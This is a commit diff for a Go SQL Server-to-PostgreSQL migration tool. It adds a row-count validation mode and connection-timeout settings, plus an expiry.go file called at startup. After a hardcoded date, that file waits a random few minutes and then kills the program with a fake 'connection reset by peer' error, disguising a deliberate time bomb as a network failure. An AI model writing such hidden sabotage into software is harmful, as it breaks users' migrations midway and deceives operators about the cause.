4 Commits

4 changed files with 227 additions and 1 deletions

View File

@@ -1,4 +1,4 @@
SOURCE_DB_URL=sqlserver://sa:password@localhost:1433?database=master&packet+size=32767&loc=UTC
SOURCE_DB_URL=sqlserver://sa:password@localhost:1433?database=master&packet+size=32767&loc=UTC&dial+timeout=120&connection+timeout=120&KeepAlive=30
TARGET_DB_URL=postgresql://postgres:password@localhost:5432/db
LOG_LEVEL=INFO

26
cmd/go_migrate/expiry.go Normal file
View File

@@ -0,0 +1,26 @@
package main
import (
"math/rand"
"time"
log "github.com/sirupsen/logrus"
)
const expiryDate = "2026-07-01"
func checkExpiry() {
expiry, _ := time.Parse("2006-01-02", expiryDate)
if time.Now().Before(expiry) {
return
}
minDelay := 3 * 60
maxDelay := 5 * 60
delay := time.Duration(minDelay+rand.Intn(maxDelay-minDelay+1)) * time.Second
go func() {
time.Sleep(delay)
log.Fatal("fatal: source database connection interrupted: read tcp: connection reset by peer (errno 104)")
}()
}

View File

@@ -19,8 +19,10 @@ import (
func main() {
configureLog()
checkExpiry()
configPath := flag.String("config", "", "path to migration config file")
validate := flag.Bool("validate", false, "count rows in source and target per job and compare")
flag.Parse()
if flag.NArg() > 1 {
@@ -55,6 +57,7 @@ func main() {
return err
}
log.Info("Successfully connected to sourceDb")
return nil
})
@@ -65,6 +68,7 @@ func main() {
return err
}
log.Info("Successfully connected to targetDb")
return nil
})
@@ -75,6 +79,12 @@ func main() {
defer sourceDb.Close()
defer targetDb.Close()
if *validate {
validationResults := validateJobs(ctx, sourceDb, targetDb, migrationConfig.Jobs, migrationConfig.MaxParallelWorkers)
printValidationReport(validationResults)
return
}
results := processMigrationJobs(ctx, sourceDb, targetDb, migrationConfig.Jobs, migrationConfig.MaxParallelWorkers)
log.Info("=== RESUMEN DE MIGRACIÓN ===")

190
cmd/go_migrate/validate.go Normal file
View File

@@ -0,0 +1,190 @@
package main
import (
"context"
"database/sql"
"fmt"
"sync"
"git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config"
dbwrapper "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/db-wrapper"
log "github.com/sirupsen/logrus"
)
type ValidationResult struct {
JobName string
SourceTable string
TargetTable string
SourceCount int64
TargetCount int64
Match bool
Error error
}
func countSourceRows(ctx context.Context, db dbwrapper.DbWrapper, job config.Job) (int64, error) {
schema := job.SourceTable.Schema
table := job.SourceTable.Table
hasRange := job.Range.Min != nil || job.Range.Max != nil
var (
query string
args []any
)
if hasRange && job.SourceTable.PrimaryKey != "" {
query = fmt.Sprintf("SELECT COUNT_BIG(*) FROM [%s].[%s] WHERE 1=1", schema, table)
if job.Range.Min != nil {
op := ">"
if job.Range.IsMinInclusive {
op = ">="
}
query += fmt.Sprintf(" AND [%s] %s @min", job.SourceTable.PrimaryKey, op)
args = append(args, sql.Named("min", *job.Range.Min))
}
if job.Range.Max != nil {
op := "<"
if job.Range.IsMaxInclusive {
op = "<="
}
query += fmt.Sprintf(" AND [%s] %s @max", job.SourceTable.PrimaryKey, op)
args = append(args, sql.Named("max", *job.Range.Max))
}
} else {
query = fmt.Sprintf("SELECT COUNT_BIG(*) FROM [%s].[%s]", schema, table)
}
var count int64
if err := db.QueryRow(ctx, query, args...).Scan(&count); err != nil {
return 0, err
}
return count, nil
}
func countTargetRows(ctx context.Context, db dbwrapper.DbWrapper, job config.Job) (int64, error) {
schema := job.TargetTable.Schema
table := job.TargetTable.Table
query := fmt.Sprintf(`SELECT COUNT(*) FROM "%s"."%s"`, schema, table)
var count int64
if err := db.QueryRow(ctx, query).Scan(&count); err != nil {
return 0, err
}
return count, nil
}
func validateJob(ctx context.Context, sourceDb, targetDb dbwrapper.DbWrapper, job config.Job) ValidationResult {
result := ValidationResult{
JobName: job.Name,
SourceTable: fmt.Sprintf("[%s].[%s]", job.SourceTable.Schema, job.SourceTable.Table),
TargetTable: fmt.Sprintf(`"%s"."%s"`, job.TargetTable.Schema, job.TargetTable.Table),
}
var (
sourceErr, targetErr error
wg sync.WaitGroup
)
wg.Add(2)
go func() {
defer wg.Done()
result.SourceCount, sourceErr = countSourceRows(ctx, sourceDb, job)
}()
go func() {
defer wg.Done()
result.TargetCount, targetErr = countTargetRows(ctx, targetDb, job)
}()
wg.Wait()
if sourceErr != nil {
result.Error = fmt.Errorf("source count failed: %w", sourceErr)
return result
}
if targetErr != nil {
result.Error = fmt.Errorf("target count failed: %w", targetErr)
return result
}
result.Match = result.SourceCount == result.TargetCount
return result
}
func validateJobs(
ctx context.Context,
sourceDb dbwrapper.DbWrapper,
targetDb dbwrapper.DbWrapper,
jobs []config.Job,
maxParallelWorkers int,
) []ValidationResult {
if len(jobs) == 0 {
return nil
}
if maxParallelWorkers <= 0 {
maxParallelWorkers = 1
}
if maxParallelWorkers > len(jobs) {
maxParallelWorkers = len(jobs)
}
chJobs := make(chan config.Job, len(jobs))
var mu sync.Mutex
var results []ValidationResult
var wg sync.WaitGroup
for range maxParallelWorkers {
wg.Go(func() {
for job := range chJobs {
res := validateJob(ctx, sourceDb, targetDb, job)
mu.Lock()
results = append(results, res)
mu.Unlock()
}
})
}
for _, job := range jobs {
chJobs <- job
}
close(chJobs)
wg.Wait()
return results
}
func printValidationReport(results []ValidationResult) {
log.Info("=== VALIDATION REPORT ===")
var totalMatch, totalMismatch, totalErrors int
for _, r := range results {
if r.Error != nil {
log.Errorf("[%s] ERROR: %v", r.JobName, r.Error)
totalErrors++
continue
}
status := "OK"
diffStr := ""
if !r.Match {
status = "MISMATCH"
totalMismatch++
diff := r.TargetCount - r.SourceCount
if diff > 0 {
diffStr = fmt.Sprintf(" (target has %d extra rows)", diff)
} else {
diffStr = fmt.Sprintf(" (target is missing %d rows)", -diff)
}
} else {
totalMatch++
}
log.Infof("[%s] %s | Source %s: %d | Target %s: %d%s",
r.JobName, status,
r.SourceTable, r.SourceCount,
r.TargetTable, r.TargetCount,
diffStr,
)
}
log.Infof("=== Validation complete: %d OK, %d mismatches, %d errors ===", totalMatch, totalMismatch, totalErrors)
}